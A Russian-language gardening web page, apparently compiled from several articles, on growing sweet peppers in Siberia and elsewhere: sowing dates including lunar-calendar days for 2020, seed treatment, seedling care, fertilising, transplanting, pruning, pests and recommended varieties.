0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Правила посадки перца в сибири

Правила посадки перца в Сибири

Сибирь — регион рискованного земледелия. Но это не мешает многим овощеводом успешно сажать и выращивать такую теплолюбивую культуру как перец. Залогом успешной культивации в Сибири является верно подобранное время для посева семян и правильная посадка перца. Для правильного определения сроков посева и высадки лучше всего ориентироваться на климатические условия региона и на длительность вегетации и плодоношения перцев.

Правила посадки перца в Сибири

Когда и как высевать семена

Теплая погода в Сибири устанавливается не раньше середины мая. Относительно теплая погода держится не более трех месяцев, и в этот период часто температура может снижаться ниже 20°С днем и ниже 15°С ночью. А перец активно растет при температурах выше 22°С, при колебаниях и понижениях останавливается рост, а время плодоношения отодвигается.

Для этого региона вырастить перец возможно только рассадным способом. Сажать семена нужно за долго до посадки в огород. При рассадном способе вегетацию перцев можно разделить на такие условные периоды:

  • от посева семян до высадки рассады — 60-70 дней;
  • от высадки на грядку до первой завязи — 30 дней;
  • от начала массовой завязи до сбора урожая — 30-40 дней.

На эти особенности важно ориентироваться при посеве семян. Не стоит спешить с посевом семян перца, потому что до момента прогрева почвы до 16-18°С рассаду высаживать в грунт нельзя. Это может существенно ослабить, а иногда и погубить растения. А переросшая рассада в домашних условиях очень тяжело укореняется на новом месте и болезненно переносит пересадку.

Оптимальным временем для того, чтобы высадить перец на рассаду в Сибири, будет начало-середина марта, если предполагается высадка в неотапливаемые теплицы. А вот если планируется выращивать болгарский перец в открытом грунте, то семена высеваем в 20-х числах марта. Целесообразно высевать перец в феврале только в том случае, если он будет расти в отапливаемой теплице.

Посев по лунному календарю

При выращивании перца можно ориентироваться на даты, указанные в посевном календаре. Такой календарь основан на фазах луны. Растения, которые формируют плоды в надземной части, должны высеваться в период растущей луны. Благоприятные дни для посева перца:

  • февраль — 17-22,24-28 числа;
  • март — 1,18,19,20,21,22,23,25-30 числа;
  • апрель — 17-20 числа.

Для высадки рассады в почву также в календаре выделяют благоприятные даты: 18,19,27,28 мая.

Посев семян

Выбирайте сорта именно для Сибири

Определив оптимальные сроки посева перца на рассаду в Сибири и выбрав нужные сорта, важно тщательно подойти к процессу посева семян, уходу и выращиванию рассады.

Чтобы рассада хорошо росла нужно подобрать правильную почвосмесь, обработать ее и подготовить семена для посева. Для молодых растений грунтосмесь должна быть питательная и хорошо дренированная. Хорошо пропускать воду, не давая ей застаиваться, но частично задерживать и моментально не пересыхать. Можно приобрести специальную почвосмесь для овощей или приготовить почву собственноручно. Для этого понадобится:

Эти компоненты смешивают в пропорции 3:2:1. Готовую почву обязательно нужно продезинфицировать. Это можно сделать с помощью раствора марганцовки (1 г на 1 л воды) или перекисью (1 ст. л. на 1 л воды), любым из предложенных растворов проливают грунт и дают хорошо просохнуть.

Подготовка семенного материала

Семена перца перед посевом нужно продезинфицировать. Такую процедуру делают с помощью раствора калия перманганата или фитоспорина. Готовят 1% раствор марганцовки и в нем на протяжении 20-25 мин. замачивают семена. После этого промывают чистой водой и подсушивают. Можно использовать биофунгицид фитоспорин, несколько капель препарата добавляют к 1 л воды и замачивают семена 30 мин. Посеять обработанные семена нужно не позже 24 часов после процедуры. Часто приобретенные семена в магазине уже обработаны, это указано на упаковке, и они имеют цветное покрытие, их дезинфицировать не нужно. Обработанные семена сеем сразу в подготовленный грунт без каких-либо дополнительных обработок.

Для ускорения процесса прорастания посадочный материал практикуют замачивать. Для этого семена выкладывают на увлажненную вату или марлю, и прикрывают. Ставят в место с температурой 25-28 С. Оставляют на 3-4 дня для набухания или до появления ростков, следят, чтобы они не пересыхали, сбрызгивают теплой водой с пульверизатора.

Высадка семян

Подготовленные семена сеем в емкости, заполненные грунтом. Их аккуратно раскладывают по заранее увлажненной почве на расстоянии 2-2,5 см друг от друга. После этого присыпают землей на 1-1.5 см и закрывают пленкой. Посевы ставят в максимально освещенное теплое место. Важно помнить, что оптимальная температура для появления всходов перца 24-28 С. При такой температуре первые сеянцы прорастают через 7-10 дней.

Уход за рассадой

Когда появились дружные всходы пленку постепенно снимают. Для обеспечения полноценного роста сеянцев важно следить за такими факторами:

Обязателен правильный полив и освещение

Полив

Перец на стадии рассады нуждается в достаточном поливе. Частота и количество требуемой воды будет зависеть от температуры в помещении и объёма почвы в котором растут саженцы. При температуре выше 24 С полив проводят каждое утро. На начальном этапе это делают с помощью шприца, чайной ложки. Вода должна проникать на 3-4 см вглубь почвы. Чем ниже температура, тем реже поводят полив.

Температура

После появления всходов, если есть такая возможность рекомендуют понижать температуру до 16-18 С на 4-5 дней, это предупредит вытягивание рассады. В последующие время оптимальная температура должна поддерживаться на уровне 22-28 С, с возможным понижением в ночное время на несколько градусов.

Освещение

Очень важно для развития перца поддерживать 12 часовой световой день, это обеспечивает правильное развитие, предупреждает вытягивание стеблей и их истончением. Подсвечивают молодые растения с помощью ламп дневного света или фитоламп. В пасмурные дни лампы используют на протяжении всего дня, в солнечные включают на несколько часов сутра и вечером.

Рассадка

Когда у сеянцев вырастает два-три настоящих листа их лучше рассадить по отдельным емкостям. Для этого подойдут пластиковые стаканы и торфяные горшочки объёмом 250-330 мл или любые другие горшочки, с которых при пересадке на постоянное место будет легко достать растения, не травмируя корневую систему. Емкости наполняют грунтом, посредине делают углубление и проливают водой. Сеянцы аккуратно вместе с земляным комом с помощью ложки или садовой лопатки вынимают и аккуратно пересаживают не заглубляя. Перцы не склонны образовывать боковых корней на стеблях, поэтому заглубление при пересадке может привести к загниванию.

После пикировки растения притеняют на 3-4 дня от прямых солнечных лучей, а полив возобновляют через 4 дня.

Правила высаживания рассады

Сажать рассаду на постоянное место необходимо спустя 60-70 дней с момента ее всхода. Это совпадает со временем появления первых цветоносов на молодом кусте. Но, чтобы пересадка была безопасной, для растений должна установиться теплая погода, а грунт прогреться до 16-18 С. В Сибири это время редко наступает раньше 20 чисел мая. В конце мая погода стабилизируется, уже до минимума сведена возможность ночных заморозков, а перепады дневных температур не такие резкие. В теплицу садят рассаду на неделю-две раньше, чем в открытый грунт, но также только тогда, когда грунт достаточно прогреется.

Закалка рассады

За две недели до высадки молодые кусты закаляют, для этого выносят на улицу или балкон. Время пребывания с каждым днем увеличивая. Это поможет рассаде лучше справиться с изменениями температур после высадки в огород.

Прогревание грядки

Агрономы и огородники Сибири рекомендуют при выращивании перцев прогревать грядки. Для этого используют конский навоз, пластиковые или стеклянные бутылки, наполненные водой или натуральные камни.

  1. Навоз имеет способность согревать почву длительное время в моменты похолоданий. В целях обогрева в междурядьях делают канаву глубиной 25-30 см в нее закладывают навоз с расчетом 3 кг/ кв. м. Поливают кипятком для запуска процесса тепловыделения и прикрывают снятой землей.
  2. Бутылки наполняют водой и равномерно раскладывают на поверхности грядки. В дневное время под солнечными лучами они будут нагреваться, а ночью, когда температура воздуха и почвы понижается они будут отдавать свое тепло и согревать почву.
  3. Натуральные камни используют по такому же принципу, как и бутылки. Будут нагреваться днем, а ночью отдавать грядкам нужное тепло.

Для высадки готовят посадочные лунки, на расстоянии оптимальном для каждого отдельного сорта. В среднем на одном кв. м садят 3-4 куста. В лунки закладывают горсть луковой шелухи и 1 ст. л. древесной золы, это защитит рассаду от вредителей и будет служить подкормкой. Лунку проливают водой за пару часов до высадки рассады.

Процесс пересадки

Растения аккуратно вынимают с горшочков, не разрушая земляной ком и высаживают. Во время посадки следят, чтобы корень не загибался, а ложился ровно или по кругу. Рассаду не заглубляют, корневая шейка должна находиться на уровне поверхности. Присыпают рыхлой почвой на половину и поливают, когда вода впиталась, засыпают остальную землю и слегка прижимают грунт возле стебля.

После высадки около ствольного круга мульчируют компостом, торфом или соломой. Если температура ещё колеблется и может понижаться ниже 15 С, то советуют свежовысаженый перец на открытых грядках укрыть белым нетканым материалом, он защитит саженцы от холода, но будет пропускать солнечный свет.

Когда сеять перец на рассаду в 2020 году: сроки посева

Время, когда сажать перец на рассаду в 2020 году определяется несколькими факторами: спецификой развития перцев как культурного растения, климатическими особенностями регионов страны и, наконец, по лунному календарю. Рассмотрим каждый их этих факторов поподробнее.

Подготовка семян

Подготовка к посеву зависит от сорта растения. Сорт выбирается в соответствии с климатическими условиями региона выращивания.

Растение выращивают в парниках, теплице, открытом грунте. Процесс закладки семян в землю зависит от даты пересадки растения в основное место. Сорта ранние высевают за 50-60 дней до посадки в грунт, поздние — за 70-80 дней.

Приобретают посевной материал в специализированных магазинах или на сертифицированных интернет-площадках. На рынке покупать посевной материал не рекомендуют, так как никто не может гарантировать их качество и принадлежность к заявленному сорту.

Подготовка грунта

Начинающим огородникам можно посоветовать приобрести готовую смесь для перцев. Только добавить в нее просеянный промытый песок. На 6 литров готового грунта нужно будет взять 1 литр песка.

Нужно учесть, что к тому моменту, как подойдут сроки посадки перца на рассаду, грунт должен быть разложен по емкостям и прогрет до оптимальной для указанной культуры температуры.

Для опытных садоводов существует рекомендация по самостоятельному изготовлению плодородной почвы для рассады. Ее основой является перегной (2 части), который можно заменить хорошо перепревшим компостом. Столько же (2 части) полагается взять торфа. Дополнить одной частью промытого речного песка. Такую смесь обязательно полагается прогреть в течении часа при высокой температуре. Это защитит будущую рассаду от грибков и уничтожит семена сорняков.

Когда сеять семена перца?

Посадка перца на рассаду в 2020 году, зависит от нескольких факторов. Для хороших результатов, учитывают влияние лунных циклов, принимают во внимание климатические особенности.

Благотворной для растения является температура 20-26 градусов, длинный световой день с хорошим освещением. Для корневой системы нужна плодородная структурированная почва.

С учетом лунного календаря

Луна постоянно находится в движении относительно Земли, влияя на состояние и активность жизни растений. Поэтому для огородников составляется лунный календарь.

Известно, что вегетативный рост растений усиливается во время возрастающей Луны. В лунном календаре, отмечаются благоприятные и неблагоприятные для посева дни.

В 2020 году посев на рассаду лучше выполнять в следующие дни:

  • В январе – 31;
  • В феврале – 1,2, с 8 по 12, 15 и 24;
  • В марте — 3,4, 10 – 14, 17, 26;
  • В апреле — 2 – 4, 9, 13, 16, 25;
  • В мае – 7 — 10, 14, 15;
  • В июне – 4, 5, 12 – 14, 18.

Не стоит заниматься посевом семян 3, 4 и 20 февраля, 3,5, 31 марта, 5 апреля, а также 20, 29, 30 мая.

Нельзя производить посадку растений во время полнолуния. В этот период вегетативный рост замедляется, поэтому результат не будет отвечать ожиданиям.

Как правильно высаживать перец

Для получения крепких здоровых саженцев нужно правильно посеять семена, провести пикировку, обеспечить растению хороший уход. Чтобы всходы были обеспечены полноценным питанием, нужно воспользоваться календарем посадки перца для безошибочной посадки. В наступающем 2020 году они совпадают с благоприятными февральскими и мартовскими днями. Для посева семян готовится почва:

  1. Подбирают рыхлый, легкий состав грунта, имеющего нейтральную кислотность.
  2. Семена отбирают не пересушенные, средних размеров, не имеющие повреждений.
  3. Их предварительно обрабатывают раствором марганцовки.
  4. Затем проращивают, поместив поближе к теплу во влажную марлю.

После того, как семена проросли, их пересаживают в парник или теплицу:

  1. Сделав ямки около 1 см глубиной, помещают туда проросшие семена.
  2. Расстояние между лунками не должно превышать 2 см.
  3. Сверху посев засыпают тонким слоем почвы, поливают пульверизатором.
  4. Эффект парника создается при помощи полиэтиленовой пленки, накрывающей посадочную емкость.

Рассада болезненно реагирует на процедуру пикировки, поэтому лучше посадить ее в отдельные горшочки по 2-3 семя. Слабые ростки перед посадкой можно удалить. Лучший вариант посева – емкости из торфа. Из них рассаду вынимать не придется.

Уход за рассадой перца после всходов

После того как всходы появятся, им обеспечивают новый режим ухода. Особого внимания требуют первые всходы.

Полив рассады

Влажность почвы — важное условие для роста появившихся всходов. Нельзя допускать пересыхания грунта, но и перенасыщение влагой будет вредным.

Не стоит поливать обильно первые день-два. Если грунт слишком сухой, можно аккуратно опрыскивать при помощи распылителя. Когда на растении раскроются семядольные листья, начинают поливать традиционным способом, используя очищенную воду температурой 30 градусов. Позже поливать можно водой комнатной температуры – отстоянной или дождевой.

Помимо полива, важно соблюдать влажность воздуха в помещении. Оптимальный уровень – 60 – 70%.

Подкормка сеянцев

С целью роста и развития корневой системы сеянцы подкармливают гуматом калия. Его разводят в воде в пропорции 5 мл к 2 л.

Следующую подкормку производят в период цветения. Используют такой состав: 1,7 г борной кислоты, сернокислый марганец, сернокислое железо (по 1 г ), сернокислый цинк, сернокислая медь (по 0,2 г). Все компоненты (при соблюдении пропорций), развести в 10 литрах воды и подкармливать растения до окончания цветения.

Освещение рассады

Начало выращивания рассады приходится на весну, когда световой день недостаточно продолжительный. Поэтому придется позаботиться о подсветке. Растению необходимо освещение на протяжении 12 – 14 часов в сутки, иначе сеянцы будут тонкими и слабыми.

Для осуществления фотосинтеза необходимы фиолетовые и синие лучи, а не желтые и красные. Поэтому обычные лампы для подсветки не подходят. Лучше использовать люминесцентные или фито-лампы, или специальные светодиодные светильники. На 1 кв. метр посевов необходима мощность ламп в 200 Вт.

Подсветка должна находиться на 20 см выше верхних листьев. Поэтому со временем лампы нужно поднимать выше.

При появлении первых настоящих листьев световой день удлиняют до 14 – 16 часов. В феврале искусственное освещение включают утром, выключают в 19 – 20 часов вечера. В апреле достаточно подсвечивать утром до полудня, вечером с 16 до 19 часов.

Прищипка рассады перца

Удаление точки роста сеянцев, или прищипка — обязательный этап выращивания рассады. Это необходимо для развития боковых побегов, спящих почек, формирования большего количества цветов.

Процедуру производит после начала активного развития. Для этого ножницами обрезают верхнюю часть растения, которая находится выше 2 или 6 междоузлия. Ниже эту манипуляцию проводить не нужно.

Как правильно пикировать перец?

Даже в 200 мл стаканчиках перцу станет тесно через месяц после появления всходов. Поэтому его необходимо пикировать, то есть пересадить в более вместительную посуду.

Итак, прошли 4 недели, появились 2-3 настоящих листка на рассаде перца. Как ее вырастить дальше? Если ростки сидят в отдельных стаканчиках, то их пересаживают в емкости по 0,5 л, а потом в те, которые имеют объем 1 литр. При этом полагается полностью сохранять земляной ком вокруг растения. Лучше, если горшочки будут из материалов, которые разлагаются в почве. Тогда пересадку перца можно проводить не вынимая рассаду перца из маленьких емкостей.

Посадка рассады в теплицу

По лунному календарю все агротехнические мероприятия с этой овощной культурой проводятся во время растущей Луны, поскольку ее плоды находятся поверх земли. Если посадка рассады перца проведена верно, она будет мощной, крепкой, здоровой, а урожай плодов обильным. Северные регионы данную культуру выращивают в теплицах. Готовность рассады определяют по внешним параметрам:

  1. Стебель должен иметь от 12 до 14 листочков.
  2. Растение начало формировать бутоны.
  3. Его высота достигла 25 см.

Пересаживая растения, между ними оставляют от 50 до 60 см. Переносят саженцы к концу апреля. К этому моменту Луна начинает убывать, но расположена в созвездии Рыбы. К благоприятным дням для пересадки ростков в теплицу в 2020 году относятся 18 и 19 апреля.

Сроки пересадки саженцев на открытый участок

Растения переносят на грядки после того, как прогреется почва, температура воздуха поднимется до 18 о С, исчезнет угроза весенних заморозков. Чтобы они адаптировались к уличной температуре, их за 7-10 дней днем выносят во двор для закаливания. Период их пребывания здесь постепенно увеличивают. Май – время пересадки ростков. В 2020 году благоприятные дни для их посадки на открытом участке совпадают с 11, 12, 25, 26 мая. Посаженные с соблюдением рекомендаций лунного календаря саженцы дружно примутся, вырастут крепкими и здоровыми.

Перец: особенности ухода, посадки и выращивания

В природе насчитывают более 2 000 видов перцев, а их родина — Центральная Америка. В этой статье я расскажу про сладкий перец, который называют еще болгарским. «Мексиканец» попал в Европу в 15 веке и кружными путями, через Испанию, Турцию, Иран, в конце концов проник в наши края. Здесь он серьезно прижился, несмотря на теплолюбивость и капризный нрав — ведь достоинств у перца хоть отбавляй! Он не только богат яркими расцветками, придающими блюду праздничный вид, не только вкусен и сочен, но и является бесценным кладезем витаминов. По этой части с ним сравнится редкий овощ или фрукт.


Поспевает сладкий перец

Но чтобы получить хороший урожай, придется постараться. Этот «южанин» любит теплую погоду, поэтому в средних широтах выращивают его по большей части рассадой и в теплицах.

Перец — растение короткого дня, то есть если световой день длится менее 12 часов, перец раньше начинает переходить к плодоношению и, что немаловажно, дает более стабильные и высокие урожаи.

Сорта перца

Прежде чем сажать перец, необходимо определиться с выбором сорта, и тут все зависит не только от ваших вкусовых предпочтений, но и от назначения будущих плодов. Так, если вы намерены употреблять перцы преимущественно в свежем виде, лучше отдать предпочтение более толстостенным и крупноплодным сортам, например ‘Калифорнийское чудо’, ‘Гладиатор‘, ‘Винни-Пух’ или ‘Подарок Молдовы’. Если же основное назначение — консервация, то выбирайте мелкоплодные сорта, относящиеся к «сибирской» серии: ‘Купец’, ‘Ермак’, ‘Виктория’ и другие.

Один из самых скороспелых сортов перца, плоды созревают рано и дружно. После первого урожая перец сорта ‘Ермак’ снова зацветает и дает хороший второй урожай. Очень крупные плоды, масса которых доходит до 250 г. Урожайность сорта — 12-15 кг/м².

  • ‘Гладиатор’

Среднепоздний голландский сорт с большими ярко-желтыми плодами, вкусными, с толстой мякотью. Толщина стенок плодов доходит до 13 мм, вес отдельных экземпляров достигает 380-400 г, а урожайность 10-12 кг/м².

  • ‘Медаль’

Раннеспелый сорт, отличающийся растянутым плодоношением. Он постоянно цветет и образует новые завязи. Плоды сорта Медаль достаточно крупные — до 150 г, в биологической спелости ярко-красные по цвету, с толщиной стенки около 8-13 мм. Урожайность сорта достигает 16 кг/м².

  • ‘Йова’

Один из наиболее скороспелых российских сортов, начиная с появления всходов и до момента технической спелости проходит около 95-100 дней. Очень урожайный, сочный и толстостенный. Урожайность до 14 кг с одного квадратного метра, а масса некоторых его плодов превышает 250 г. Неприхотлив и дает отличные урожаи даже на тяжелых почвах.



  • ‘Калифорнийское чудо’

Сорт среднеранний, масса плода до 400 г, а толщина стенки до 12 мм.

  • ‘Черный кардинал’

Относится к поздним итальянским сортам, имеет необычайно красивые черно-фиолетовые плоды (в технической спелости) переходящие в красный (в биологической спелости). С 1 м² до 10 кг урожая.

  • ‘Виктория’

Сорт среднеранний, плоды по массе относительно небольшие — до 110 г, конусовидные, слаборебристые, длиной около 7-13 см, толщина стенок 7-8 мм. Урожайность 9-10 кг/м².

Обширный ассортимент семян сладкого перца вы можете найти в нашем каталоге. Смотреть подборку семян сладкого перца:

Выращивание рассады перца

Если у вас нет теплицы, то семена перца необходимо высевать в феврале, чтобы до момента пересадки в мае растения были в возрасте 90-100 дней. Перец плохо переносит пикировку, поэтому старайтесь сразу сеять семена в индивидуальные торфяные горшочки диаметром около 8-10 см. Использовать большие горшки не имеет смысла из-за медленного развития его корневой системы.


Торфяные горшочки для перца — хороший вариант

Субстрат для выращивания перца рассадным способом должен быть легкий и рыхлый и состоять из 2 частей перегноя, смешанного с 1 частью песка и 1 частью земли. На 1 кг такой смеси необходимо добавить столовую ложку золы.

Семенам перца необходима предпосадочная обработка — их нужно держать до набухания на протяжении пяти часов в воде, температура которой около +50°С. После этого их необходимо поместить для наклевывания во влажную ткань на 2-3 дня, температура в помещении около +20°С. Проведя такую несложную предпосадочную подготовку семян, вы получите всходы уже буквально на следующий день после посева.

Посеянные семена перца необходимо хорошенько полить, а сразу после этого накрыть полиэтиленовой пленкой либо стеклом. До появления всходов они могут находиться в любом теплом (около +22°C) месте, освещение при этом неважно, можно и в темноте. После появления всходов оптимальная температура для выращивания рассады днем около +26. +28°С, ночью около +10. +15°С.

Не стоит баловать перцы излишними поливами, это может только повредить им — вызвать заболевание черной ножкой. Но старайтесь не допустить и пересыхания субстрата. Вода для полива должна быть теплой — около +30°С, от чрезмерно холодной рассада будет хилой, заболеет и даже может погибнуть. Не забывайте следить и за воздухом в помещении, в котором выращивается рассада, он должен быть не слишком сухим. Опрыскивайте растения, а само помещение хорошенько проветривайте, не забывая защищать от сквозняков.

Рассада перца требует дополнительного освещения. На протяжении февраля месяца ее необходимо освещать с 7 часов утра до 9 вечера. Перед высадкой рассада нуждается в закаливании, постепенному приучению к лучам солнца, более низким температурам, ветру и дождю. Для этого растение выносят на свежий воздух, понемногу увеличивая время его пребывания там. Во время закаливания следите за погодными условиями, нельзя допустить чтобы рассада перца попала под заморозок либо пониженную температуру — для перца это ниже +13°С.

Посадка перца

Лучшие предшественники для перца: лук, огурцы, тыква, капуста после сидератов, кабачок и морковь. Плохие предшественники: картофель, перец, помидоры, физалис и баклажан.

Для выращивания лучше всего подходят легкие почвы. Почву под перец лучше приготовить заранее — за год, внеся под предшественника 5 кг органических удобрений на квадратный метр, а осенью по 50 г калийных и фосфорных удобрений под глубокую перекопку. Весной на участок — в верхний слой грунта, вносим 40 г аммиачной селитры. За пять дней до того как пересаживать рассаду перца на постоянное место, займитесь обеззараживанием почвы, делать это необходимо с помощью раствора — на ведро воды добавляем столовую ложку медного купороса.

Высаживают рассаду в открытый грунт в конце мая — середине июня, по схеме 40х40 см. В пленочную неотапливаемую теплицу рассаду перца высаживают в начале апреля, а в туннельные укрытия — в конце мая.


Высаживание перца

Помещать саженцы в лунки старайтесь на такую же глубину, на которой растения росли в рассадном ящике, не обнажая корни и не прикапывая его прикорневую шейку. Перец не любит холодного грунта, и если вы хотите получить серьезный урожай, устройте ему высокие грядки, которые необходимо поднять на 25-55 сантиметров.

Помните, перец сильно подвержен переопылению, поэтому если вы сажаете на своем участке несколько его сортов, старайтесь расположить их на максимальном удалении друг от друга и по возможности разделяйте их между собой с помощью посадок высокорослых помидоров, кукурузы и подсолнечника.

Выращивать перец высадкой семян в открытый грунт нецелесообразно даже в южных регионах. Сеять придется все равно поздно, когда почва прогреется, растение будет развиваться медленнее, первые плоды поспеют позже, да и срок плодоношения перца окажется существенно короче.

Уход за перцем

Уход за перцем состоит из своевременных поливов, подвязок, прополок и подкормок. Первую подкормку рассады перца необходимо провести в фазе 1-2 настоящих листиков, для чего в 1 л воды смешивают 0,5 г аммиачной селитры, 1 г калийных удобрений и 3 г суперфосфата. Вторая подкормка через 2 недели после первой, дозу минеральных удобрений для нее необходимо удвоить.

Эффективны подкормки рассады перца специальным настоем крапивы, для приготовления которого необходимо взять 1 часть крапивы и 10 частей воды — настаиваем 2 дня. Последнюю подкормку нужно провести за 2 дня до того, как вы намерены высадить рассаду на постоянное место, при этом дозу калийных удобрений увеличиваем до 7 г на 1 л воды. За сезон нужно произвести около 3-4 подкормок перца куриным пометом — 1:10, чередуя такие подкормки с внекорневыми, для которых нужно использовать минеральные удобрения, например нитрофоску (столовая ложка на ведро воды).


Грядка перцев

При недостатке калия листочки перца скручиваются и на них появляется засыхающая кайма. Но с калием необходимо быть осторожным — перец не переносит изобилие хлористого калия. Если растению недостает азота, его листья становятся матовыми и, приобретая сероватый оттенок, постепенно мельчают. Когда недостает фосфора, нижняя сторона листочков перца становится насыщенно фиолетовой, а сами листья прижимаются ближе к стволу растения и поднимаются вверх. Если недостает магния, листики приобретают мраморную окраску, а излишек в почве азота приводит к сбрасыванию завязей и цветков перца.

В жаркую и влажную погоду обязательно необходимо проводить пасынкование (удаление боковых побегов), особенно это касается нижних пасынков, и наоборот, если стоит жаркая, но сухая погода, растения не пасынкуют, поскольку листовая масса отлично предохраняет от испарения влажность почвы. Опытные овощеводы советуют удалять центральный цветок на растении, растущий из первого разветвления, это поспособствует повышению урожая.

В период вегетации перцы необходимо несколько раз обрезать, стараясь укорачивать самые длинные побеги и добиться отсутствия затененных ветвей. Обязательно удаляйте все отростки перца ниже главной развилки его стебля, а также ветки внутри кроны. Обрезку необходимо производить раз в десять дней и после сбора плодов. Одновременно с обрезкой производят и обработку почвы.

Постарайтесь привлечь в огород насекомых-опылителей, для этого во время цветения опрыскивайте растения сахарным раствором: на литр горячей воды 100 г сахара и 2 г борной кислоты. Отличный результат дают подкормки перца жидкими органическими удобрениями.

Полезно мульчировать перец перепревшей соломой — слой около 10 см, благодаря чему можно сократить частоту поливов, сведя их до раза в 9-10 дней. Своевременный уход за растениями перца заключается и в подвязке растений. Производить подвязку необходимо после окучивания и мульчирования.

Вредители и болезни

Наиболее распространенные болезни перца: фитофтороз, белая гниль, макроспориоз, вершинная гниль, септориоз, черная ножка. Больше других перцу причиняют вред слизни, белокрылка, совка, тля, колорадский жук и медведка. Для защиты перца от повреждения медведкой за час до высадки его рассады предварительно сделанные лунки необходимо наполнить водой. Высадив рассаду перца, опять распылителем опрыскать посадки. За сезон 3 раза растения перца необходимо опылять с помощью древесной золы — лучше по росе. Это также поможет защитить их от вредителей.

Если вы заметите на рассаде перца тлю, обработайте перец с помощью сыворотки — полтора литра на ведро воды. После проведения данной процедуры припудрите растения просеянной древесной золой.

Выращивание перца в открытом грунте, как вырастить сладкий перец

Без него на огороде не обойтись, как и в заготовках. А вот выращивание перца в открытом грунте возможно не везде. Этот мексиканец уж очень теплолюбив и капризен. Но даже у себя, в далёкой сибирской деревне, на западе Сибири, я успешно выращиваю болгарские и острые перчики.

Условия для выращивания сладкого перца

Выращивать хоть сладкий, хоть горький перец в открытом грунте нужно рассадным способом. Не успевает его вегетационный период в нашем климате до созревания плодов. Поэтому начинаем готовиться ещё в феврале, подбирать сорта и покупать семена.

Вернее, начинать будем даже не в феврале, а осенью, ведь нам нужно заранее приготовить участок, правильно его выбрать.

  1. Чтобы было солнечно, нигде не затеняло посадок, перец неравнодушен к солнечному свету и малейшее затенение плохо сказывается на урожайности.
  2. Чтобы нигде не продувало. Лучше всего делать грядки возле южной стороны дома, где нет сквозняка. Можно создать искусственную стену из высоких насаждений или поставить временное заграждение.
  3. Чтобы не меньше трёх лет на участке не росли ни томаты, ни баклажаны, в общем, ни один из представителей паслёновых. Чтобы лишний раз не подвергать наши растения возможности заразиться болезнями, оставшимися в почве.
  4. Чтобы почва была без сорняков, чистая, без остатков ботвы.
  5. Чтобы были внесены удобрения, которые будут необходимы перчику в период роста. На каждый квадрат площади вносим по две столовых ложки суперфосфата, по стакану древесной золы и ведру навоза либо перегноя.
  6. Чтобы почва была как можно ближе к нейтральной по кислотности, хорошо пропускала воздух и удерживала влагу, была лёгкой и рыхлой.

Вот такие не сложные на самом деле условия. И ещё очень важно вырастить хорошую, здоровую и крепкую рассаду. Ведь условия выращивания будут почти спартанские.

Выращивание рассады перца

Высаживают рассаду перца в возрасте примерно 60 дней, плюс около двух недель на всходы (иногда больше). Рассчитываем сроки посева исходя из времени высадки перца в открытый грунт. Это время, когда температура почвы повышается выше +18 градусов, а ночная температура не опускается ниже +15. У нас это самый конец мая, значит семена будем сеять в середине или начале марта. раньше, в феврале высеваются семена перцев, которые будут посажены в теплицы. разница между посевом в две недели.

Подбор сорта

Для открытого грунта выбирайте самые ранние и устойчивые к болезням сорта. Не нужно гнаться за экзотикой. Экзоты обычно плохо всходят и дают вообще никакой урожай,потому что слишком привередливые.

Подбирайте сорта, которые адаптированы к вашему климату. Тогда они точно принесут вам неплохой урожай. Я всегда для незащищённого грунта использую сорта:

  • Сибирский Князь
  • Подарок Молдовы
  • Оранжевое чудо F1
  • Кардинал F1

Посев семян

Семена перчиков любят посидеть в почве подольше, очень уж они туговсхожие. Им просто нужно немного помочь, подготовить их к посеву. Семена обязательно проверяются на всхожесть в солевом пятипроцентном растворе. Все пустые выбрасываются. После их нужно обработать сначала в растворе марганца, для обеззараживания, потом в зольном растворе для питания (на литр воды берётся столовая ложка древесной золы).

После всех таких манипуляций семена промываются и просушиваются. Дальше их нужно положить на салфеточку, слегка влажную и в тёплое место, но температура при таком проращивании не должна опускаться ниже +25 градусов.

Если вы покупали семена перцев заранее, то за месяц до посева их можно повесить в тёплом месте, к примеру, возле батареи в полотняном мешочке. Высокая температура активизирует их и они быстрее проснутся.

Важным при посеве семян перцев будет качество почвы. От неё зависит, какая будет рассада и как она выживет после пересадки в открытый грунт.

На ведро подготовленной почвы для рассады добавляем 1 стакан золы или извести, хорошо перемешиваем. Рассада перца не любит пересадки, поэтому я высаживаю её сразу «на вырост», в отдельные стаканчики по 2 семечка. Семена надо сажать на глубину 1,5 см, рассада перца не любит заглубления при посадке в грунт, если посадить мелко, то корни сформируются близко к поверхности.

В южных районах можно высевать перец на рассаду в середине января, если вы собираетесь высаживать его в теплицу. В сибирском регионе в это время солнца мало и семена могут просидеть в земле 2 месяца, половина может попросту сгнить. Я начинаю посев в середине марта в тёплую землю (25-30 градусов), поливаю тёплой водой, использую только талую. Накрываю стаканчики плёнкой и ставлю на солнечное тёплое место. через 2 недели появляются всходы.

Подкармливаю рассаду жидким удобрением для комнатных цветов, там есть всё, необходимое для развития хорошей рассады. Развожу 2 чайные ложки удобрения в 5-ти литрах воды, начинаю подкормку, как только появятся первые листочки. В ранний период роста не использую никакой органики, иначе всё пойдёт в зелень.

За 10 дней до высадки рассаду обязательно нужно начинать закаливать. Вначале выносить на улицу на час, постепенно увеличивая время. Только место выбирайте такое, чтобы растения не сдуло ветром, тихое, без сквозняка. Закалённая рассада приживается намного быстрее и меньше болеет после пересадки.

Высадка сладкого перца в грунт

Рассаду перца следует высаживать в тёплую землю, не ниже 18 градусов. Лунки я делаю рядами через 30 см, а расстояние между рядков 60 см. Перец любит свободу, лучше посадить меньше растений.на большей площади и получить хороший урожай. да и ухода получается меньше. В каждую лунку сыплю по столовой ложке калийного удобрения, обратите внимание, чтобы оно не содержало хлора. Теперь наливаю тёплую! воду (20-25 градусов). Как только вода впитается, высаживаю рассаду. Заглублять растения нельзя, как они росли в стаканчиках, на такую глубину и надо высаживать.

Некоторые сорта высокорослых перцев требуют подвязки, поэтому при посадке у вас должны быть заготовлены колышки. Вначале нужно воткнуть в лунку колышек, а потом посадить растение, чтобы не повредить корни.

Высаживать рассаду стараюсь в пасмурный день или под вечер, чтобы прямые лучи солнца не сожгли нежные растения.

Пока рассада не примется, примерно в течении недели, я её не поливаю и держу под укрывным материалом с дугами.

Чтобы облегчить уход, уменьшить число поливов и отказаться от рыхления, можно просто, сразу после высадки замульчировать кустики опилками или соломой. Можно вместо мульчи использовать торф или компост, только прошлогодний.

Под посадки перца нельзя вносить свежий навоз, можно сжечь корни, или от большого количества органики перцы начнут наращивать зелёную массу в ущерб плодам.

